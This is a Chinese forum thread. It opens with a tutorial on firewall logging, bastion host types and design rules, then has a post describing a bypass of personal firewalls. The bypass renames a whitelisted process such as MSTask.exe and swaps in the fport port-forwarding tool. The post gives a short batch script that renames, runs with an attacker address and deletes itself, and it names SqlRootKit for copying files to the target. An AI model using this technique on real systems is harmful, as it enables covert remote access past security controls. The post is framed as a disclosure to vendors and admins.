如果你希望从本版中学到知识的话,请进来(防火墙)

　日志和警报

　　包过滤或筛选路由器一般在默认情况下为了不降低性能是不进行日志记录的。永远不要认为你的防火墙会自动地对所有活动创建日志。筛选路由器只能记录一些最基本的信息，而电路级网关也只能记录相同的信息但除此之外还包括任何NAT解释信息。因为你要在防火墙上创建一个阻塞点，潜在的黑客必须要先穿过它。如果你放置全面记录日志的设备并在防火墙本身实现这种技术，那么你有可能捕获到所有用户的活动包括那些黑客。你可以确切地知道黑客在做些什么并得到这些活动信息代审计。一些防火墙允许你预先配置对不期望的活动做何响应。防火墙两种最普通的活动是中断TCP/IP连接或自动发出警告。相关的警报机制包括可见的和可听到的警告。

　　建立一个防火墙

　　在准备和建立一个防火墙设备时要高度重视。以前，堡垒主机这个术语是指所有直接连入公网的设备。现在，它经常汲及到的是防火墙设备。堡垒主机可以是三种防火墙中的任一种类型:包过滤，电路级网关，应用级网关。

　　当建设你的堡垒主机时要特别小心。堡垒主机的定义就是可公共访问的设备。当Internet用户企图访问你网络上的资源时，首先进入的机器就是堡垒主机。因为堡垒主机是直接连接到Internet上的，其上面的所有信息都暴露在公网之上。这种高度地暴露规定了硬件和软件的配置。堡垒主机就好像是在军事基地上的警卫一样。警卫必须检查每个人的身份来确定他们是否可以进入基地及可以访问基地中的什么地方。警卫还经常准备好强制阻止进入。同样地，堡垒主机必须检查所有进入的流量并强制执行在安全策略里所指定的规则。它们还必须准备好对付从外部来的攻击和可能来自内部的资源。堡垒主机还有日志记录及警报的特性来阻止攻击。有时检测到一个威胁时也会采取行动。

设计规则

　　当构造防火墙设备时，经常要遵循下面两个主要的概念。第一，保持设计的简单性。第二，要计划好一旦防火墙被渗透应该怎么办。

　　保持设计的简单性

　　一个黑客渗透系统最常见的方法就是利用安装在堡垒主机上不注意的组件。建立你的堡垒主机时要尽可能使用较小的组件，无论硬件还是软件。堡垒主机的建立只需提供防火墙功能。在防火墙主机上不要安装像WEB服务的应用程序服务。要删除堡垒主机上所有不必需的服务或守护进程。在堡垒主机上运行少量的服务给潜在的黑客很少的机会穿过防火墙。

　　安排事故计划

　　如果你已设计好你的防火墙性能，只有通过你的防火墙才能允许公共访问你的网络。当设计防火墙时安全管理员要对防火墙主机崩溃或危及的情况作出计划。如果你仅仅是用一个防火墙设备把内部网络和公网隔离开，那么黑客渗透进你的防火墙后就会对你内部的网络有着完全访问的权限。为了防止这种渗透，要设计几种不同级别的防火墙设备。不要依赖一个单独的防火墙保护惟独的网络。如果你的安全受到损害，那你的安全策略要确定该做些什么。采取一些特殊的步骤，包括

　　· 创建同样的软件备份

　　· 配置同样的系统并存储到安全的地方

　　· 确保所有需要安装到防火墙上的软件都容易，这包括你要有恢复磁盘。

堡垒主机的类型

　　当创建堡垒主机时，要记住它是在防火墙策略中起作用的。识别堡垒主机的任务可以帮助你决定需要什么和如何配置这些设备。下面将讨论三种常见的堡垒主机类型。这些类型不是单独存在的，且多数防火墙都属于这三类中的一种。
单宿主堡垒主机

　　单宿主堡垒主机是有一块网卡的防火墙设备。单宿主堡垒主机通常是用于应用级网关防火墙。外部路由器配置把所有进来的数据发送到堡垒主机上，并且所有内部客户端配置成所有出去的数据都发送到这台堡垒主机上。然后堡垒主机以安全方针作为依据检验这些数据。这种类型的防火墙主要的缺点就是可以重配置路由器使信息直接进入内部网络，而完全绕过堡垒主机。还有，用户可以重新配置他们的机器绕过堡垒主机把信息直接发送到路由器上。

　　双宿主堡垒主机

　　双宿主堡垒主机结构是围绕着至少具有两块网卡的双宿主主机而构成的。双宿主主机内外的网络均可与双宿主主机实施通信，但内外网络之间不可直接通信，内外部网络之间的数据流被双宿主主机完全切断。双宿主主机可以通过代理或让用户直接注册到其上来提供很高程度的网络控制。它采用主机取代路由器执行安全控制功能，故类似于包过滤防火墙。双宿主机即一台配有多个网络接口的主机，它可以用来在内部网络和外部网络之间进行寻址。当一个黑客想要访问你内部设备时，他(她)必须先要攻破双宿主堡垒主机，这有希望让你有足够的时间阻止这种安全侵入和作出反应。

　单目的堡垒主机

　　单目的堡垒主机既可是单堡垒也可是多堡垒主机。经常，根据公司的改变，需要新的应用程序和技术。很多时候这些新的技术不能被测试并成为主要的安全突破口。你要为这些需要创建特定的堡垒主机。在上面安装未测试过的应用程序和服务不要危及到你的防火墙设备。使用单目的堡垒主机允许你强制执行更严格的安全机制。举个例子，你的公司可能决定实施一个新类型的流程序，假设公司的安全策略需要所有进出的流量都要通过一个代理服务器送出，你要为这个表的流程序单独地创建一个新代理服务器。在这个新的代理服务器上，你要实施用户认证和拒绝IP地址。使用这个单独的代理服务器，不要危害到当前的安全配置并且你可以实施更严格的安全机制如认证。

　　内部堡垒主机

　　内部堡垒主机是标准的单堡垒或多堡垒主机存在于公司的内部网络中。它们一般用作应用级网关接收所有从外部堡垒主机进来的流量。当外部防火墙设备受到损害时提供额外的安全级别。所有内部网络设备都要配置成通过内部堡垒主机通信，这样当外部堡垒主机受到损害时不会造成影响。

　　四种常见的防火墙设计都提供一个确定的安全级别，一个简单的规则是越敏感的数据就要采取越广泛的防火墙策略，这四种防火墙的实施都是建立一个过滤的距阵和能够执行和保护信息的点。这四种选择是:

　　·筛选路由器

　　·单宿主堡垒主机

　　·双宿主堡垒主机

　　·屏蔽子网

　　筛选路由器的选择是最简单的，因此也是最常见的，大多数公司至少使用一个筛选路由器作为解决方案，因为所有需要的硬件已经投入使用。用于创建筛选主机防火墙的两个选择是单宿主堡垒主机和双宿主堡垒主机。不管是电路级还是应用级网关的配置都要求所有的流量通过堡垒主机。最后一个常用的方法是筛选子网防火墙，利用额外的包过滤路由器来达到另一个安全的级别。

一直以来都有一个梦想：偶要是能发现些漏洞或BUG什么的该多好啊！于是整天对着电脑瞎弄瞎研究，研究什么呢？研究如何突破防火墙（偶这里指的防火墙是软体型的个人防火墙，硬件的偶也没条件。）嘿嘿，你还别说，还真没白研究，还真给偶发现了大多数防火墙的通病。这个BUG能让我们欺骗防火墙来达到访外的目的，具体情况是怎么样的呢？请看下面的解说！
首先，我要介绍一下Windows系统特性，当一个程序运行时，它不能删除，但却能够改名！而当系统里的被保护程序遭到删除或损坏或改名时系统就会及时调用备份文件给予还原！我再讲讲防火墙，大家都知道许多防火墙的“应用程序规则”里一般默认就会让IE浏览器（iexplore.exe）、Outlook Express（msimn.exe）、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、services.exe、svchost.exe通过，而大多的防火墙认为只要是与规则里的路径及文件名相同就Pass！以这样的检测方法来决定是否放行，但它却完全没考虑到如果是别的文件替换的呢？——就相当于古装片里的易容术，易容后就认不得了！这就给了我们机会，我们可以利用这个BUG来欺骗防火墙来达到访外的目的！
小知识：其实现在大多木马采用的DLL插线程技术也就是利用了这个原理，它们首先隐蔽的开启一个认证放行的程序进程（如Iexplore.exe进程），接着把DLL型木马插入这个线程内，然后访外时就可轻松突破防火墙的限制了——因为防火墙是不会拦截已认证放行的程序的。
原理讲完了，我们现在讲讲该如何利用这个BUG了！这里我用虚拟机做实验，制造如下条件：
为了更符合现实，我给服务器安装了“天网防火墙”、Radmin（但由于防火墙指定了访问IP地址，所以没办法正常连接！），MSSQL SERVER、Serv-u。首先我们用常用的方法进行端口转发，看看防火墙有什么反应！
第一步，启用AngelShell Ver 1.0里的Fport（用来进行端口转发的服务端，几乎可以转发任何端口），然后在本地用FportClient（用来进行端口转发的客户端）监听好！
第二步，直接在CMDSHELL里运行“e:\www\fport.exe 4899 192.168.1.1 7788”，这时我们看到虚拟机里的“天网”对Fport马上进行了拦截。?

看到了吧！由于Fport并不是认证放行的，防火墙马上就进行了拦截！OK，现在我们实行欺骗计划，看偶如何突破防火墙的！还是执行第一步，然后新建一个批处理，内容如下：
ren MSTask.exe MSTask1.exe
ren fport.exe MSTask.exe
MSTask.exe 4899 192.168.1.1 7788
Del %0
命名为go.bat，接着用SqlRootKit把“Fport.exe”和go.bat 一起copy到目标机子的c:\winnt\system32\（也就是MSTask所在的目录）在SqlRootKit里执行go.bat（注意如果要改MSTask.exe的名的话就需要有管理员权限）。
当FportClient出现“已经接受到远程计算机的连接！”时，用Radmin客户端连接本机的4899端口。

我们已经成功突破限制（由于防火墙没有限制本地连接4899端口，我们用Fport转发了它的端口，登录时等于本地连接，因此我们能够成功连接），这样一来，我们本不能逃过防火墙的Fport便变成了一个有“插线程”技术的端口转发工具了！
据我实验，国内的防火墙几乎无一例外的“拥有”这个BUG！虽然这个BUG不会带来什么大的危害，但总是给入侵者多了一个黑我们的机会！
WTF老大说独乐乐不如众乐乐，所以我还是公布出来了，一是可以让我们国内的防火墙有所改进，二是给网管们提个醒！由于小弟技术有限，难免会出现错误，欢迎各位指正批评。

好长的贴子啊，学习了

家大业大 防火墙也大~